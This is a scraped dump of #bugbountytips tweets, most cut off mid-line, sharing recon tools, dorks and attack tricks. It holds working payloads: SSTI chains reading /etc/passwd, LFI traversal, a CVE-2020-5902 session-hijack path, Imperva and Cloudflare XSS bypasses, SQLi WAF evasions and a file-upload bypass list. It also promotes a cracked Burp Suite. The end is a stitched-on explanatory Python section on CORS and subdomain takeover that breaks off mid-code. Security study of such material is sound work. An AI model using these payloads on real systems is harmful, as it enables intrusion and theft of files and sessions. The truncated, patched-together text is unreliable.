-Subdomain enumeration
-Finding endpoints
-Finding parameters, by @0xElkot
#bugbountytips #BugBounty #bugbountytip https://t.co/Rf4Vfwmfp2 https://t.co/Lu
Bug bounty fast hunting find all subdomains using all tools and then use all endpoint gra
RT @HackerOn2Wheels: Content Type Forcing - The XSS you may have missed.
This is my quick and practical blog post on how to get XSS in responses with Content-Ty
https://t.co/LgaPBZuAR4
#bugbounty #bugbountytip #BugBountyTips #infosec
Tutorial on privilege escalation and post-exploitation tactics in Google Cloud Platform environments (PDF, 66 pages):
https://t.co/6LGDGTiI0m
#PenTest #Hacking #bugbountytips #redteam
RT @0xrudrapratap: @intigriti #bugbountytips
@intigriti #bugbountytips
RT @sw33tLie: Friendly reminder that zdns > massdns #bugbountytips
RT @LooseSecurity: I once exploited SSTI in a Flask app with the payload:
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/tmp/flag").r
If you find SSTI, you NEED to show how to exploit it! Reading files is perfect. #bugbountyt
payload not by me
Dear @pdiscoveryio 😍
Thanks for the "httpx" tool, it works like a jet plane🚀
#hackwithautomation #assetdiscovery #recon #subdomains #bugbountytips #httpx
Bypass CSRF like a boss. Seven ways to bypass CSRF security by @harshbothra_
https://t.co/F6IYxtD5Xa
#csrfbypass #bugbounty #cybersecurity #bugbountytips
RT @AmitMDubey: A small Burpsuite trick which helped me to find Blind SSRF -
Step 1: Use Intruder to Bruteforce Headers
Step 2: Add Burp collaborator URL as value.
Step 3: Add prefix numerical payload (Pitchfork)
Step 4: Use the Taborator extension to monitor hits
#bugbounty #bugbountytips https://t.co/lLzBZf5KZU
RT @secalert: Regarding CVE-2020-5902:
[https://{host}]/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?director
there you will see the session files like:
"sess_XXYYXXYYXXYYXXYYXXYYXXYYXX".
Set this in the cookie and you are in admin's session. #bugbountytips
RT @hackison: #bugbounty #bugbountytip #bugbountytips #hacking #hackison #hacke
Find SSRF issues by injecting headers (like x-forwarded-host, etc.) with this tool:
https://t.co/C2E8XUKGRz
#bugbountytips #bugbounty https://t.co/OEkYLIt3YE
RT @C1h2e11: A tips from Nahamsec @NahamSec
curl -X GET https://t.co/pIuaaFEPZL{organization}
https://t.co/5XaiHYznhj{organization}
https://t.co/7AlvIjzWht{IP address}
Shodan search query ASN:{ASN}
#bugbountytip #bugbountytips https://t.co/RGdbP6rj4u
RT @HusseiN98D: WooT! There is always a way. New #bugbounty #pentest short write u
https://t.co/nlAv4pMPhx
RT @HusseiN98D: A 2 year old RCE on a @Hacker0x01 program. Next post at 400 RT! AL
I'm interested in any security research team / pentest work (remote). If any company/t
Finding for API keys, Tokens and Passwords with Github Dorks
#bugbounty #bugbountytips https://t.co/lOS0parDCn
RT @SpiderSec: 2FA Bypass Technique
#bugbounty #bugbountytips https://t.co/l0bB4NVGZl
RT @1m4xx0: And sometimes for (LFI)
url?para=//..//..//..//..//..//..//..//..//etc//passwd//
Works!!
#bugbountytip
#BugBounty
#bugbountytips
#bugbounty
RT @ja1sharma: Infosec meme for BugBounty hunters.
#Bugbounty #BurpSuite #Scanner #bugbountytips #infosec #MEMES #XSS #SQLi https
Shellshock still works on some servers; you can also try the nmap script:
nmap -sV -sC -v -T4 --script http-shellshock -p 443,80 <target>
#bugbountytips #bugbounty https://t.co/hWfe6AZWsi
RT @malcolmx0x: host:attacker,com>> blocked
host:attacker,com
x-forwarded-host:target,com>>ATO
#bugbountytips
RT @HossamSec: Add this endpoint to your DIRs list. You may get lucky and access a das
/uplynk/examples/dash.html
Make your own private lists of DIRs while hunting and you may get lucky and access crit
#BugBountyTips #infosec https://t.co/nfI5oSQ4jW
RT @HusseiN98D: Analysis of an RCE I found past week. RT and Like if you want more! I
Part 1: https://t.co/gQHKx5lpas
Part 2: https://t.co/TcnApVmJP7
#bugbountytips #bugbounty
RT @Santhoshvr97: Use file:// instead of http:// in the parameter.
Sometimes it will bypass URL restrictions while redirecting in the page, and use this payload to
it will work.. ✌️
Payload: file:///</script><script>alert(1)</script>
#bugbounty #bugbountytips #infosec
#xss
RT @anspattnaik: #bugbountytips #BugBounty
Just exploited a template injection vulnerability, {{7*7}} = 49,
and I'm pretty sure it's using a Jinja2 template, but when I try the payload below the results ar
{{[].__class__.__base__.__subclasses__().pop(40)('etc/passwd').read() }}
any suggestions?
RT @Sahad_nk: Found a JIRA SSRF and want to make it more impactful? Look for what's
#BugBounty #BugBountyTips #HackerOne #BugCrowd #Synack https://t.co/LtTsSpokH
RT @hackison: [Sensitive Directories] intitle:"Index of" wp-config.php
[Sensitive Directories] intitle:index.of./.sql
[Pages Containing Login Portals] site:*/cgi-bin/login.html
[Various Online Devices] inurl:ftp://ftp robots.txt
#dorks #hacking #bugbountytip #bugbountytips #pentesting
RT @HusseiN98D: Time for another #BugBountyTip : While testing file upload forms on I
RT @0x240x23elu: Find subdomain CNAME with one liner #bugbountytips #bug #subdom
This may be old https://t.co/KUPHVhMhct
RT @noobsec_org: Always view the page source code, sometimes you get some GOLD like m
#bugbountytips #bugbountytip #OuthackThemAll #ItTakesACrowd #togetherwehithard
RT @HusseiN98D: #BugBountyTip time: combine Arjun from @s0md3v with Burp Intruder
#bugbountytips #pentest RT & L
RT @HusseiN98D: #BugBountyTip time: I've got a RCE by using this tip: while testing fo
Sometimes this fools the backend and you get a shell! RTs & comments are appreciate
RT @cry__pto: Best #firefox addons for #Hacking:
-HackBar
-Cookies Manager+
-User-Agent Switcher
-Tamper Data
-FoxyProxy Standard
-Wappalyzer
-HttpRequester
-RESTClient
-Tampermonkey
-XSS Me
-SQL Inject Me
-iMacros
-FirePHP
#bugbountytips #bugbountytip #hacking #OSINT #pentest
RT @HusseiN98D: #BugBountyTip time: when you see a POST request made with JSON,
Follow, book coming!
RT @TakSec: XSS filter bypass using stripped </p> tag to obfuscate.
P2 Stored XSS $1500 on a private bug bounty program.
XSS Payload:
<</p>iframe src=javascript:alert()//
#xss #bugbountytip #bugbountytips #bugbounty #hacking @brutelogic https://t.co/ltj
RT @bugbountyvillag: Tip by @thedawgyg
When testing for SSRF using a black list, take internal IP addresses and when encoding
#bugbountytip #bugbounty #bugbountytips
RT @YourNextBugTip: All CSRF Bypasses from all over the net.
Last one is the most interesting one (bypass XHTTPRequest check using flash), but not e
Did I miss anything?
#bugbountytips #bugbountytip #bugbounty https://t.co/f6VrZlivFz
RT @bugbountynights: You can check Jira Information Disclosure vulnerability (CVE-201
RT @mrunal110: Find CNAME Records #bugbounty #vulnerability #informationsecurity #
#Bugbountytips https://t.co/6EjP0xZQ3b
RT @_Y000_: Ondblclick xss Payloads
<h1 ondblclick=alert`_Y000!_`>_Y000!_</h1>
<marquee ondblclick=alert`_Y000!_`>_Y000!_</marquee>
<xss ondblclick="alert`_Y000!_`" autofocus tabindex=1>_Y000!_</xss>
<w="/x="y>"/ondblclick=`<`[confir\u006d`_Y000!_`]>z
#xss #payloads #bugbountytips
RT @kobsoNinja: Bypassing SSRF Filter using Enclosed Alphanumerics
AWS --> ①⑥⑨.②⑤④.①⑥⑨.②⑤④
Credit: @EdOverflow
#BugBountyTips
RT @ankit_2812: Bugbounty tips#2
Try these MySQL tricks to break some #WAFs out there.
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
#SQLi #bypass #bugbountytip #bugbountytips #hackerone #HackThePandemic #hacke
RT @AbdoFarwan: Notes from @NahamSec's awesome interview with @inhibitor181.
#BugBounty
#bugbountytips https://t.co/V9kNVbuxT1
RT @Jhaddix: I know it's common sense but remember when parsing JS for endpoints/fi
/ = Root directory
. = This location
.. = Up a directory
./ = Current directory
../ = Parent of current directory
../../ = Two directories backwards
#bugbountytips ?
RT @HusseiN98D: Simple script to gather all TLDs of a company:
value=$(echo $1|cut -f1 -d.)
echo $value
sed -e "s/^/$value./" /root/wordlist/tld.txt | filter-resolved
Usage: bash https://t.co/ekil2jT7Im https://t.co/PWAspnKSB5
#bugbountytips #bugbountytip https://t.co/HWeUUi3aFu
RT @Yumi_Sec: If a web application allows you to upload a .zip file, zip:// is an interestin
#BugBounty #BugBountyTips #InfoSec https://t.co/gB9uC4vSPw
RT @HusseiN98D: Testing password reset functionalities. If you can think of other tes
#BugBounty #BugBountyTips #BugBountyTip #pentest https://t.co/esiC6PjUMD
RT @mark_valenzia: Massive thanks to @d0nutptr for his awesome blog on SSRF and @s
#bugbountynoob #bugbountytips https://t.co/2OTvxBLxIe
RT @pwntheweb: Bypassing most FILE Uploads filters for $$$$
* .htaccess <- upload htaccess
* file.svg <- uploading svg = xss
* file.SVg <- must try case mismatch
* file.png.svg
* file.php%00.png
* file.png' or '1'='1
* ../../file.png
* file.'svg <- invalid ext.
#bugbountytips #BugBounty
Done with subdomain enumeration? Here is how you can get more assets related to you
#hackwithautomation #assetdiscovery #recon #subdomains #bugbountytips https://t.
RT @shreyasrx: Cambium ePMP 1000 Vulnerable for Command execution and changing o
1/2
Google dork >
intitle:ePMP 1000 intext:Log In -site:*.com -site:com.*
A Lot of hosts are still vulnerable.
#bugbountytips
#shieldindia
#Hacking https://t.co/cmclnV5DTh
RT @gwendallecoguic: Short @oneliner to retrieve altnames from ssl certificates. Thanks
https://t.co/t2hyxeD99E https://t.co/uBwdSCnvzI
RT @SalahHasoneh1: Price Manipulation Method 3
#cybersecurity #infosec #ethicalhacking #bugbounty #bugbountytips #bugbountytip ht
RT @debangshu_kundu: Just bored.
So posting this poll.
What was the most exciting bug you've ever found?
Doesn't necessarily need to be your highest paid bug!
Vote and comment down below
#bugbounty #hacking #bugbountytips #bugbountytip
#infosec Hashtags for reach XD
I just published Android App Security & Testing https://t.co/cQWTaOqQ5w
It was long pending, found a draft in my notes, corrected it and thought why not share i
#androidsecurity #bugbountytips #bugbounty
RT @_sickwiz: Another govt website. Reported to @NCIIPC . Though they don't offer bou
#bugbountytips #cybersecurity #Ethicalhacking #rvdp #vulnerability https://t.co/Mhua
RT @Jhaddix: #bugbounty #bugbountytips People sometimes ask how you can "eyeball
discovery! https://t.co/PDGu7IHYk3
RT @Debian_Hunter: Best place for understanding Graphql , thnx man #bugbountytips #
RT @0xLupin: That's why you should stop reporting a simple alert box and start thinking
If you don't trust my words trust @MrMustacheMan3 and @brutelogic :)
#hacking #bugbounty #bugbountytips #hacker #XSS #RCE https://t.co/PE8FwIebBp
RT @neutrinoguy: Best way to search Project Sonar database for subdomain enumeratio
https://t.co/t5WYUzjvvp
Credits to @CalumBoal
#bugbountytips
RT @ssh0x00r: thanks a lot 💝,
@NullByte @HackerSploit @LiveOverflow @stokfredrik @Jhaddix @CristiVlad25 @cry__pt
@InsiderPhD @thecybermentor
#bugbountytips #Pentesting #hacking #infosec
RT @BeingBharatiyaa: @AmazonHelp @amazon getting error page by clicking on 'Comm
RT @bountyhunter_fr: Subdomain recon tools step by step :
1) amass - scan for subdomains
2) altdns - compute wordlist with result for new subdomains
3) dnsprobe - check if found subdomain is valid
4) nmap - scan subdomain ports
#bugbountytips
RT @AldenAous: Imperva WAF XSS bypass:
Payload : <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9
Codepen : https://t.co/ls37WLuqEK
#BugBounty #BugBountyTip #BugBountyTips #WhiteHats https://t.co/fB2kjCvZVn
RT @OAcybersecurity: FORD Session token URL lead to Reflected XSS #bugbountytips #
RT @sillydadddy: #bugbountytips
Does anyone have a list of root domains of all public programs in the BB platforms?
Could you please share ?
If not I am planning to make one and share
thanks
RT @Rajat_sharma111: Recently, I have started using the tool "Arjun" for finding the hi
“Learning path for Bug Bounty” by Udit Bhadauria https://t.co/NpscvKutUB
#cybersecurity #bugbounty #bugbountytips
RT @adrien_jeanneau: A little #BugBountyTips that I use for my recon: use this Google D
RT @rapiddns: The https://t.co/S8Mkzf3yAd Updates.
Added:
[*] 360 million mx records
[*] Support CIDR format query
[*] Subdomain query matches cname records
Removed:
[*] Recent query
#recon #bugbounty #bugbountytip #bugbountytips #hackerone https://t.co/59wNXBx
RT @s3rgiomazari3go: Note 3: Google Chrome uses an XSS auditor, which when testing
#bugbountytips #infosec #hacking
RT @thedarkwayg: Initial report: Open Redirect+XSS -> Triaged -> Resolved
Check it again and can still "Open Redirect" -> Report and Bounty
The payload: javascript:@youtube.com
Use the ":" character to bypass the filter and "@" to redirect to that domain
#BugBountyTips #BugBounty #ItTakesACrowd https://t.co/PrTMuJqKNA
RT @ryan_kl_ko: #uqcyber PhD student Walt Lin sharing his story on how he discovered
RT @cyberdefender5: Successfully Completed ✌✌🏻✌🏻 #Lookingforward #moretocome
#Thanksalot #Akhilbro #Ersegment #Ethicalhackingtraining #Bugbountyhunting #Cybe
RT @Sudhans42246878: It's 6:35 in the morning
Couldn't sleep the whole night
And now when I have come to bed ... I still can't sleep because
I am hunting bugs and thinking of all the possible ways I can break into a WebApplicat
Is it a sign I have become one??🙄
#bugbountytips
RT @renniepak: Check for stored XSS in emails. The email itself obviously doesn't trigge
RT @Xer0Days: Changed @0xbharath's VirusTotal sub-domains enumeration script. Craw
@appseccouk #bugbountytip #bugbounty #recon #bugbountytips
https://t.co/6JXlkUtURd
#httpx v0.0.7 updates:-
☑Added TLS Probe (Subdomains from SSL)
☑Added Path/File Request support
☑Added Content-type fingerprinting
☑Added Matcher/Filters for Status Code/Length
https://t.co/baW40ThDCi
#hackwithautomation #bugbounty #security #bugbountytips https://t.co/caIs5Uz6Tu
RT @INR_0x0Ma5K: My first Hall of fame for this platform @Bugcrowd, to happy and righ
Most of Duplicate. This one is boosting point for my side.
#bugbountytips #Bounty #hacklearning https://t.co/m87mJH0Krx
RT @hsakarp_ilajna: #Recon:
1. #Subdomain Scraping: Sublist3r, SubFinder, Amass
2. Subdomain #Bruteforcing: MassDNS with jhaddix_all.txt
3. Subdomain #Permutations scan: #AltDNS
4. #Repeat steps 2 to 3 three more times to find subs of subs
#bugbountytips
#cybersecurity #infosec #ethicalhacking
RT @trbughunters: 🚀 CORS Protection RegEx Bypass 🚀
#BugBounty #bugbountytips #bugbountytip #CyberSecurity #infosec #hacked https://
RT @rnd_infosec_guy: Bug bounty tip: don’t tweet useless bug bounty tips
#bugbountytips
RT @dhakal_ananda: Yay! I earned $100 for a 0 user-interaction Account Takeover Vuln
Try re-registering the user with the same email. If the password gets reset, you got the
#bugbounty #bugbountytips
#PmG - Extract parameters/paths from urls
https://t.co/0Oah7JwH76
#bugbountytips #recon https://t.co/09hZn9fwvq
Yay, My first writeup
I just published Bypassing OTP via reset password
#bugbountytips #bugbounty
https://t.co/N4gSywXvx4
RT @Jhaddix: Sunday Night #BugBounty #bugbountytips
1 Stored XSS
1 Reflected XSS
1 Admin Panel exposed to interwebz
1 potentially sensitive video exposed to the pub internet
Remember to check/search security-related GitHub issues for the frameworks you run a
RT @ehsayaan: I was very inconsistent about what should I do when hunting on a progr
#bugbounty #bugbountytips https://t.co/4d4ip9qSor
RT @B3nac: Nice find! 🎉 Here's an adb one-liner to list activities. adb shell dumpsys packa
https://t.co/RQqpWyHLPp
RT @GochaOqradze: Post based Cors misconfiguration PoC
#bugbountytips #bugbountytip https://t.co/0NQPWfxCLH
RT @ArmanSameer95: A Tool to find broken links: Broken Link Checker!
Check this out guys
https://t.co/M0458IjFZ2
#bugbounty #bugbountytips #Hacking https://t.co/yq3HM3fTmw
RT @scspcommunity: #Bug #Bounty #Tips part 4!
#bugbounty #bugbountytips #ethicalhacking #hacking #pentesting #PenTest #infosec
https://t.co/bUpmo6t6Oe
RT @sriramoffcl: Access revoked only on Front-end still vulnerable on Back-end !
#BugBounty #bugbountytips #hackerone #bugcrowd
RT @trbughunters: Top 25 Local File Inclusion (LFI) Parameters 🛡️
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #
RT @OAcybersecurity: Hackerone CTF XSS Challenge $250 (BugPoc) 2020 https://t.co/K
RT @ExploitedSystem: Hey Guys Just Uploaded a Video Checking it out would mean alot
#cybersecurity #infosec #bugbounty #bugbountytips #ethicalhacking #hacking #passw
RT @AniruddhaKl: Network Protocols
#infosec #cybersecurity #cybersec #networksecurity #vapt #bugbounty #bugbountytip
RT @Akshanshjaiswl: I just published my writeup on Pre-Access to Victim’s Account via
#bugbountytips #bugbountytip #bugbounty #infosec
RT @plenumlab: Very useful tool by @TomNomNom
Feed it URLs and it will give you a list of interesting ones, at least in theory, https://t.co/1GW
#BugBounty #bugbountytips
Bypass I learned from @rene_kroka this week:
https://t.co/SzIavQtyOR
onpointerrawupdate= " A='',B=!A+A,C=!B+A,D=A+{},E=B[A++],F=B[G=A],H=++G+A,
👆 = alert(1)
#bugbounty #bugbountytips
#pentest #pentesting #hacking #bugbounty #bugbountytips #web #KaliLinux #linux #
6 steps and 2 tools to attack JSON Web Token
https://t.co/uRHKNn6pSW
https://t.co/PBDNgsjLnh
#hacktory_tools #bugbounty #cybersecurity #bugbountytip #bugbountytips #cybersec
Cache Poisoning on Wordpress --> Stored XSS --> POST "/wp-admin/user-new.ph
Triaged with "High" instead of "Critical" . Don't know what is wrong !
#bugbountytips Tweet has tip as well :D
@andirrahmani1 #bugbountytips
RT @Digitalsanjog: Content Marketing: India is a country of storytellers. We have storyte
for more just gaze at
https://t.co/fj7v5RvW2z
#storytelling #contentmarketing #contentstrategy #storyteller #bugbountytips #Conte
RT @Jhaddix: Wednesday Night #BugBounty #bugbountytips
Recording my #hacktivitycon2020 talk tonight, so no hacking. A couple of small updates
RT @ssh0x00r: interested in bug bounty ? (free tip by @NahamSec )
LINK IN BIO
#infosec #cybersecurity #hacking #bugbountytips
RT @ssh0x00r: i've been scratching my head for long time, thanks @stok @hakluke for
check this out: https://t.co/5ntEFHHPCz
#hacking #bugbountytips #infosec #motivation
RT @frankmosigisi: What is the best impact if you find
React app api key and want to report it
#bugbounty #bugbountytips
RT @netspooky: #Cloudflare #WAFbypass
Just got a $1000 payout 💵📥
<uu src=@'@' onbigclick=import('//0a"&nbsp;"0a0a?0a/')>mou%09se<|/
#BugBountyTips #bugbountytip #redteam #waf #obfuscation #security #linux #togeth
RT @Nep_1337_1998: To Find #f5 instances
Shodan:
+-+-+-+-+-
F5-Login-Page
WWW-Authenticate: Basic realm=BIG-IP
BigIP
BIG-IP
http.favicon.hash:-335242539
http.title:"BIG-IP&reg;- Redirect"
https://t.co/0n61Dor29y
@dnkolegov #bugbountytips #f5 #recon #infosec @vis_hacker https://t.co/QNCKbIBv4
RT @1m4xx0: https://t.co/dzjyB9hTDN
Made a simple directory search tool using python which will send notification on your Te
Feel free to use the code and modify according to your need!
#BugBounty #bugbountytips #bugbounty #python #redteam
RT @Unknownuser1806: Find #CVEs
https://t.co/wOOxzbydBN
https://t.co/lKvQHEpTHl
https://t.co/n1teetr8Fm
https://t.co/1VBangzPPl
https://t.co/X2wQL3dlax
https://t.co/0Wo6cTaaNK
https://t.co/EE1lHBzVfg
https://t.co/VTeYjVvtYi
https://t.co/ELwT1ILHWG
https://t.co/XBkHfF1rSP
#bugbounty #bugbountytips
Second medium blog-post:
Stealing your Paytm information using XSS by: @VirenPawar_
https://t.co/fPs3KiXFL0
#bugbounty #infosec #bugbountytips #xss #medium #paytm #SharingIsCaring
I've been scratching my head for a long time, thanks @stok @hakluke for a motivation
check this out: https://t.co/5ntEFHHPCz
#hacking #bugbountytips #infosec #motivation
#hacking #BugsBunny #bugbountytips #javabug #CVE
Javabug learning mini-project
https://t.co/PISv5OdYWN
RT @pdiscoveryio: Major #update to the public bounty and disclosure programs, we've a
- https://t.co/aLRBoIam6V
#security #recon #bugbounty #bugbountytips #infosec
“How I Hacked My College’s Online Exam Portal During COVID-19 Quarantine Period” by
#bugbountytips
#xploitprotocol
https://t.co/oFpw0k2Yvy
SQLTruncScanner - Scan endpoints for possible SQL Truncation vulnerabilities.
#bugbountytips
#xploitprotocol
https://t.co/tfUPQNlIhO
BurpSuite-Xkeys: A Burp Suite Extension to extract interesting strings (key, secret, toke
#bugbountytips
https://t.co/N4e7DgDRsy
So happy with my HackerOne stats over these past 90 Days! #BugBounty #HackerOne #
#bugbountytips
Does anyone have a list of root domains of all public programs on the BB platforms?
Could you please share?
If not, I am planning to make one and share it
thanks
FORD Session token URL lead to Reflected XSS #bugbountytips #bugbounty #hackerone
RT @disclose_io: New VDPs and #bugbounty programs at https://t.co/JtaCJYPiNA!
Total: 926
Full safe harbor: 126 (13.6%)
Partial safe harbor: 207 (22.4%)
w/ Bounties: 399 (43.1%)
w/ HOF: 593 (64.0%)
w/ Swag: 45 (4.9%)
Missing yours? Submit a PR!
#bugbountytips #infosec #cybersecurity
The biggest takeaways from most talks are things I am already biased towards. Unlearn
Imperva Waf XSS ByPass :
Payload : <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9
Codepen : https://t.co/ls37WLuqEK
#BugBounty #BugBountyTip #BugBountyTips #WhiteHats https://t.co/fB2kjCvZVn
RT @scspcommunity: #bugbounty tips part 2
#hacking #ethicalhacking #bugbounty #bugbountytip #securitytesting #webapp #pent
https://t.co/4pcPahsC8Z
RT @scspcommunity: Bug Bounty Tips part 3
#bugbountytip #bugbountytips #bugbounty #bughunting #bughunter #hackerone #bug
RT @scspcommunity: Take your #bugbounty game to a higher level with the Bug Bounty
#Pentesting #infosec #cybersecurity #informationsecurity #hacking #ethicalhacker #e
RT @BugBountyWeekly: You can use @hackvertor to generate random IP to bypass rate-
RT @scspcommunity: A little treasure for all you #BugBounty Hunters! 😉
#infosec #informationsecurity #infosecurity #CyberSecurity #cyber #cybersec #PenTes
HOURS & HOURS OF FREE CYBER SECURITY TRAINING??? (I'm losing it) https://t
August is going to be.. crazy!
feat: @Hacker0x01 @defcon @redteamvillage @AppSec_Village @Bugcrowd @secarmyof
#bugbounty #bugbountytips #appsec #infosec https://t.co/PAbmt6Zms6
Wednesday Night #BugBounty #bugbountytips
Recording my #hacktivitycon2020 talk tonight, so no hacking. A couple of small updates
RT @william_leeser: #bugbountytips #BugBounty If you are starting now and don't have
This is a short survey by @AndyInfoSec_ to learn about bug bounty hunting preferences
https://t.co/Pzi6NQyjun
#infosec #bugbounty #bugbountytips #vapt #cybersec #Hacker #togetherwehitharder
RT @AniruddhaKl: This is a short survey by @AndyInfoSec_ to learn about bug bounty hu
https://t.co/e17U8dPAoy
#infosec #bugbounty #bugbountytips #vapt #cybersec #Hacker #togetherwehitharder
This is a short survey by @AndyInfoSec_ to learn about bug bounty hunting preferences
https://t.co/e17U8dPAoy
#infosec #bugbounty #bugbountytips #vapt #cybersec #Hacker #togetherwehitharder
this is baller #bugbountytips https://t.co/V02NNJ4DFR
Technique, Tool and Lecture (TTL) #20
-
-
🤓 Follow @gainsec
-
https://t.co/rvDexPiL6X
-
#Hacking #ethicalhacker #bugbountytips #infosec #pentesting #pentester #cybersecu
RT @FindomainApp: If you're using our services, look for "CODE: 502" and "ERROR: The
RT @mehmetcangunes: I was included in the Hall of Fame by GOOGLE😀
https://t.co/jeo7qLld2R
#bugbounty #infosec #ethicalhacking #CyberSecurity #halloffame #bugbountytips http
RT @_Y000_: Xss payload
-->'"<h1><img src="/" =_=" title="onerror='javascript=pr\u006fmpt`_Y000
#payload #xss #bugbountytips https://t.co/nMGEmCjlkj
RT @TheJulfikar: extract endpoints from JavaScript files by @renniepak
cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | s
#bugbountytips #bugbountytip #bugbounty https://t.co/pzEK1vXePR
RT @UrielYochpaz: I can upload any file to a jetty server
But when I try uploading JSP files I get an error "Could not initialize org.apache..."
Any help?
#bugbountytips
RT @hsakarp_ilajna: #IDOR_TIPS
1. Extracted URLs of the application from the Wayback Machine using a wayback script.
2. Made a script with a custom wordlist to fuzz the obtained URLs.
3. One of them leaked sensitive content based on the #application's workflow.
#bugbountytips #bugbounty #infosec #cybersecurity
RT @bountyhunter_fr: Password reset function token leak
After sending the password reset request, sometimes the reset token is leaked in the HT
#bugbountytips
RT @EvMd15: #bugbountytips #wordpresssecurity #wordpress
List backup file wp-config https://t.co/lbegI0dJuy
RT @chiraggupta8769: #FREE 2ಠ2ಠ ♥
Burp Suite Professional Edition v2020.7 x64 Full Activated + All Addons – Discount 100%
By @3XS0
Link : https://t.co/d10yTBiWxk
#BurpSuite #bugbounty #bugbountytips https://t.co/2u5MUDv4iD
RT @Jhaddix: Tuesday Night #BugBounty #bugbountytips
Spent about 3 hours hunting. Didn't find anything.
RT @aish_kendle: Last week, collaborated with @thakare_prateek and hijacked 24+ sub
Some tips :
-Enumerate subdomains from multiple tools
-Do check the 404 pages
-Check the cname record
-Automate everything
#bugbounty #bugbountytips #recon https://t.co/Jw2B72QjrW
RT @pdnuclei: # Nuclei templates v2.0.6 updates.
- More CVEs.
- More takeovers.
- More workflows.
https://t.co/HHUvgjcHAq
Shout out to @dwisiswant0, @EdOverflow, adiffpirate, ankh2054,@nahoragg, @Marmela
#infosec #hackwithautomation #bugbountytips #pentest #cybersecurity https://t.co/D
RT @JaggarHenry: Automating thousands of subdomain takeovers for fun and for profit.
https://t.co/nJa0i4kRyt https://t.co/Cwrv1MNCkw
Initial report: Open Redirect+XSS -> Triaged -> Resolved
Check it again and can still "Open Redirect" -> Report and Bounty
The payload: javascript:@youtube.com
Use the ":" character to bypass the filter and "@" to redirect to that domain
#BugBountyTips #BugBounty #ItTakesACrowd https://t.co/PrTMuJqKNA
RT @r0bre: Today I'm releasing JSMon, an automated JS file change monitor for #bugbo
https://t.co/EZFBW3QUuz
Big thanks to @EdOverflow @Yassineaboukir for inspiring this & @TomNomNom @s
#bugbountytip #bugbountytips #hacking #infosec #recon https://t.co/IjTKonoByv
RT @ceos3c: Let's talk about UFW and VPS. Ethical Hacking Diaries #10 now up (video w
https://t.co/tt5gIpElm1
#linux #cybersecurityawareness #cybersecurity #itsecurity #bugbounty #openbugbou
RT @Tismayil1: Yes I awarded 2200$ in Private Program.
USED Repos
Port Scan : https://t.co/H2z9ieqauA
DirSearch : https://t.co/1L6MutcaEc
Backup Scanner : https://t.co/76A96QYjRD
#BugBounty #bugbountytip #bugbountytips #WhiteHats https://t.co/VWF3Txn6K5
RT @t1nd19d: If you're looking for flexibility when doing offensive forensics or data manipulation,
#bugbountytips #BugBounty
If you're looking for flexibility when doing offensive forensics or data manipulation, master regex
#bugbountytips #BugBounty
Subdomain recon tools step by step :
1) amass - scan for subdomains
2) altdns - compute wordlist with result for new subdomains
3) dnsprobe - check if found subdomain is valid
4) nmap - scan subdomain ports
#bugbountytips
CORS vulnerability
https://t.co/yJL5qKXC8L not working? Try with company.tld
Sometimes the check is only on the domain name without the top-level domain, so that you
#bugbountytips
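The tip above describes an origin check that compares only the registrable label and ignores the TLD. As an added example (not from the tweet and not any particular product's code), the Python below puts that flawed check beside a strict allowlist check and shows the CORS response headers each would produce; `company` and all origins are constructed placeholders.

```python
from urllib.parse import urlsplit

# Constructed allowlist of origins that may receive credentialed CORS
# responses; a real deployment would load this from configuration.
ALLOWED_ORIGINS = {"https://company.com", "https://app.company.com"}


def weak_origin_check(origin: str) -> bool:
    """The flawed pattern the tip describes: the TLD is dropped before the
    comparison, so any 'company.<tld>' someone else registers is accepted."""
    host = urlsplit(origin).hostname or ""
    labels = host.split(".")
    return len(labels) >= 2 and labels[-2] == "company"


def strict_origin_check(origin: str) -> bool:
    """Hardened form: exact match of scheme + host against a fixed allowlist."""
    return origin in ALLOWED_ORIGINS


def cors_headers(origin: str, check) -> dict:
    """Headers a server would attach to a credentialed response for `origin`
    when `check` accepts it; an empty dict means no CORS headers at all."""
    if not check(origin):
        return {}
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",  # stop caches from reusing a response across origins
    }


if __name__ == "__main__":
    for o in ("https://company.com", "https://company.tld", "https://company.com.example.test"):
        print(o, "weak:", weak_origin_check(o), "strict:", strict_origin_check(o))
```

The weak check accepts `https://company.tld`, which is exactly the case the tip says to try; the strict check rejects it because only the listed origins match. Exact matching of the full origin (scheme and host) is the fix, not a longer substring.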
Bash code for manual subdomain takeover testing:
cat subdomains.txt | xargs -n1 dig @1.1.1.1 | grep -A10 NXDO | grep CNAME
#BugBounty #bugbountytips #bugbountytip @hacktivist1337
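The pipeline above keys on an NXDOMAIN status followed by a CNAME record in the same dig output. As an added example (not part of the tweet), the Python below applies the same rule to dig output parsed in-process, run here over constructed sample output for three hypothetical names under example.test; pointed at captured dig output for your own zone, it lists the dangling CNAMEs a defender should remove before anyone else notices them.

```python
import re

# Constructed sample of what `dig @1.1.1.1 <name>` prints, abridged to the
# header status line and the answer/authority section. All names are hypothetical.
SAMPLE_DIG_OUTPUT = {
    "blog.example.test": (
        ";; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 11111\n"
        ";; ANSWER SECTION:\n"
        "blog.example.test.\t300\tIN\tCNAME\tdeleted-site.pages.example-host.test.\n"
    ),
    "www.example.test": (
        ";; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 22222\n"
        ";; ANSWER SECTION:\n"
        "www.example.test.\t300\tIN\tCNAME\tlb.example.test.\n"
        "lb.example.test.\t60\tIN\tA\t192.0.2.10\n"
    ),
    "old.example.test": (
        ";; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 33333\n"
        ";; AUTHORITY SECTION:\n"
        "example.test.\t3600\tIN\tSOA\tns1.example.test. hostmaster.example.test. 1 7200 3600 1209600 3600\n"
    ),
}

STATUS_RE = re.compile(r"status:\s*([A-Z]+)")
# One resource record line: owner, TTL, class IN, type CNAME, target.
CNAME_RE = re.compile(r"^(\S+)\s+\d+\s+IN\s+CNAME\s+(\S+)", re.MULTILINE)


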